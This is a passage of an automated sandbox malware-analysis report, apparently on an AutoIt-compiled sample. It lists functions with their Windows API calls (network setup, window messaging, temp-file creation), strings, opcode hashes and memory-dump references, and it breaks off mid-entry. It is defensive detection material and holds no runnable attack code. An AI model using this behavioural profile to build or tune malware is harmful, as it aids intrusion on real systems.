                                                                                                                                                          • Opcode ID: 117f436b5060df6d3f08e102506f894a54e7e09a0c6fc8badeb5c2095d15d9d4
                                                                                                                                                          • Instruction ID: 0062787f471c5f0dd36943d8a43cb5ccb83be8b8b977a272e55d565b7e97d355
                                                                                                                                                          • Opcode Fuzzy Hash: 117f436b5060df6d3f08e102506f894a54e7e09a0c6fc8badeb5c2095d15d9d4
                                                                                                                                                          • Instruction Fuzzy Hash: 4011D072D01A58BBDB24DB9CDC48BAD77FAAB063A4F194021EE81EB1D0D370AD54C790
                                                                                                                                                          Function 001753F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0017544C
                                                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00175475
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                                                          • String ID: <local>
                                                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                                                          • Opcode ID: 79bc68fb7f30f73d69f774faf1c95868000760913aa980725e6942129c07be3f
                                                                                                                                                          • Instruction ID: c8f7e7f27dfb9433b98852ab73cbf392bb10fb991644e72ef1fb9d33be1f626c
                                                                                                                                                          • Opcode Fuzzy Hash: 79bc68fb7f30f73d69f774faf1c95868000760913aa980725e6942129c07be3f
                                                                                                                                                          • Instruction Fuzzy Hash: 66119170141A21BADB198F518884EEABA7AEF12756F10C12AF54A56440F3B059C0C6F0
                                                                                                                                                          Function 0017ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: htonsinet_addr
                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                          • API String ID: 3832099526-2422070025
                                                                                                                                                          • Opcode ID: 13c2975001ee7a18ab2f1e63f41a3f6fb0a75d53d73558f827c12c2ddeb2e5fe
                                                                                                                                                          • Instruction ID: 56352866b4ff2cbcd89e389c27a49156b115bda87c9c28027734c9f75055eecd
                                                                                                                                                          • Opcode Fuzzy Hash: 13c2975001ee7a18ab2f1e63f41a3f6fb0a75d53d73558f827c12c2ddeb2e5fe
                                                                                                                                                          • Instruction Fuzzy Hash: F5012234200204ABCB249FE4DC86FEDB374EF94724F208416F91A9B6C1DB31E810C752
                                                                                                                                                          Function 0015C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0015C5E5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 1456604079-1403004172
                                                                                                                                                          • Opcode ID: 420e50a2c39ac493304ff8f6126e37c37739ef10007105d8bbaddee5c8db9530
                                                                                                                                                          • Instruction ID: 4fa0ddcf8b304a0b6d07d44bd7fd1be018d4d6ed04076de0db6977bc737624b0
                                                                                                                                                          • Opcode Fuzzy Hash: 420e50a2c39ac493304ff8f6126e37c37739ef10007105d8bbaddee5c8db9530
                                                                                                                                                          • Instruction Fuzzy Hash: F201B571611229AFCB08EFA4CC51CFE73AAAB523117140619F833AB2D1EB70691C9790
                                                                                                                                                          Function 0016C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __fread_nolock_memmove
                                                                                                                                                          • String ID: EA06
                                                                                                                                                          • API String ID: 1988441806-3962188686
                                                                                                                                                          • Opcode ID: bf2d19974734f45195ad0319377a4c8e9ee5437d74901657bc96a7b56d06d430
                                                                                                                                                          • Instruction ID: 8d8af4d0118040a0b51b7b2163e341528cd6927c41c1f1f809660b78aece072f
                                                                                                                                                          • Opcode Fuzzy Hash: bf2d19974734f45195ad0319377a4c8e9ee5437d74901657bc96a7b56d06d430
                                                                                                                                                          • Instruction Fuzzy Hash: 5C01B5729042586EEF28DBA8CC56FBE7BF89B15711F00415AE197D6181E6B4A708CB60
                                                                                                                                                          Function 0015C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 0015C4E1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 1456604079-1403004172
                                                                                                                                                          • Opcode ID: b036e41440a130db25cda8716580dade0563ef4d093ee47b1591a9b2cced90e8
                                                                                                                                                          • Instruction ID: ed4a79a0fb5789fecf51e30f7676332631820a4cb45c8168e5a70f27da402c2f
                                                                                                                                                          • Opcode Fuzzy Hash: b036e41440a130db25cda8716580dade0563ef4d093ee47b1591a9b2cced90e8
                                                                                                                                                          • Instruction Fuzzy Hash: 9B018F71A41218AFCB08EBA4C962EFF73AD9B25301F140025F923E72C1EB645E1C96A1
                                                                                                                                                          Function 0015C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 0015C562
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 1456604079-1403004172
                                                                                                                                                          • Opcode ID: 7b61d5892b4d74e15f3b01072ee28c81d7764073bf468ed76bf7afa985a11fcc
                                                                                                                                                          • Instruction ID: df0b2409f04513e2bfb413484a1c41be51b8296248ce13563285daf6827df838
                                                                                                                                                          • Opcode Fuzzy Hash: 7b61d5892b4d74e15f3b01072ee28c81d7764073bf468ed76bf7afa985a11fcc
                                                                                                                                                          • Instruction Fuzzy Hash: 3801F271B01218ABCB08EBA4D942EFF33AD9B21702F140025F913E72C1EB209F1C96A1
                                                                                                                                                          Function 0016804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClassName_wcscmp
                                                                                                                                                          • String ID: #32770
                                                                                                                                                          • API String ID: 2292705959-463685578
                                                                                                                                                          • Opcode ID: cc019d5262a3084bb1502245ff3de6a615d2e40ac49d7e09abe8152d58537697
                                                                                                                                                          • Instruction ID: 65c036cc584af97513f5d0fc5d23da1b53875d740da63054772a110d1dd87f72
                                                                                                                                                          • Opcode Fuzzy Hash: cc019d5262a3084bb1502245ff3de6a615d2e40ac49d7e09abe8152d58537697
                                                                                                                                                          • Instruction Fuzzy Hash: 73E0D87360022927D720EAA6AC4AE9BFBACEB51764F000026F924D7181D7B0D68587E0
                                                                                                                                                          Function 0015B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0015B36B
                                                                                                                                                            • Part of subcall function 00142011: _doexit.LIBCMT ref: 0014201B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message_doexit
                                                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                                                          • API String ID: 1993061046-4017498283
                                                                                                                                                          • Opcode ID: 29d5c44af3254301c5d3fecf23108eb951f5fda560314e36f1d9785aa66c66ec
                                                                                                                                                          • Instruction ID: 90c59cda690c1ecff5980d3c63dd27928cb9c912f67b3d99334b764e78723728
                                                                                                                                                          • Opcode Fuzzy Hash: 29d5c44af3254301c5d3fecf23108eb951f5fda560314e36f1d9785aa66c66ec
                                                                                                                                                          • Instruction Fuzzy Hash: 6FD0123128872833D21936957C47FD566888F15B51F140416FF48665D28BE294D041D9
                                                                                                                                                          Function 0019BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 0019BAB8
                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0019BCAB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                          • String ID: WIN_XPe
                                                                                                                                                          • API String ID: 510247158-3257408948
                                                                                                                                                          • Opcode ID: a1dd1c0b62588d9c38b66f9e1678a09a59d0c1ec302626bcd63be4c9ec45bd56
                                                                                                                                                          • Instruction ID: 245213639c808e29b1306cbcd043b8d42ebfd052e96d7b186dac4dcb1941d452
                                                                                                                                                          • Opcode Fuzzy Hash: a1dd1c0b62588d9c38b66f9e1678a09a59d0c1ec302626bcd63be4c9ec45bd56
                                                                                                                                                          • Instruction Fuzzy Hash: 3FE0C970C0811DEFCF15DBA8E985AECB7B8BB08300F15C886E022B3450C7719A45DF21
                                                                                                                                                          Function 00188495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0018849F
                                                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001884B2
                                                                                                                                                            • Part of subcall function 00168355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001683CD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                          • Opcode ID: 1a317db207c2eaad5421c0632d2ffe122f80728d525fc0454b17e5e2f7d18548
                                                                                                                                                          • Instruction ID: 7e0fc88aa99e6a493327441b43e4783996094014868fc2fe7285ef10f747d8a3
                                                                                                                                                          • Opcode Fuzzy Hash: 1a317db207c2eaad5421c0632d2ffe122f80728d525fc0454b17e5e2f7d18548
                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0A932384300B7E624A370AC0BFD26A04AB24B00F000929720AAA6C0CAA0B8008220
                                                                                                                                                          Function 001884C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001884DF
                                                                                                                                                          • PostMessageW.USER32(00000000), ref: 001884E6
                                                                                                                                                            • Part of subcall function 00168355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001683CD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                          • Opcode ID: da4a9e0288115a1856acbe332fac7f631fd417593f87efc998077dcd19472065
                                                                                                                                                          • Instruction ID: 0893a641d3d1939adf9c54a2ec17f5523677f3ebd975d604914a2dcae257da67
                                                                                                                                                          • Opcode Fuzzy Hash: da4a9e0288115a1856acbe332fac7f631fd417593f87efc998077dcd19472065
                                                                                                                                                          • Instruction Fuzzy Hash: 85D022323803007BE724A370AC0FFC37604EB29B00F000929730AAA6C0CAF0F800C321
                                                                                                                                                          Function 0016D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 0016D01E
                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0016D035
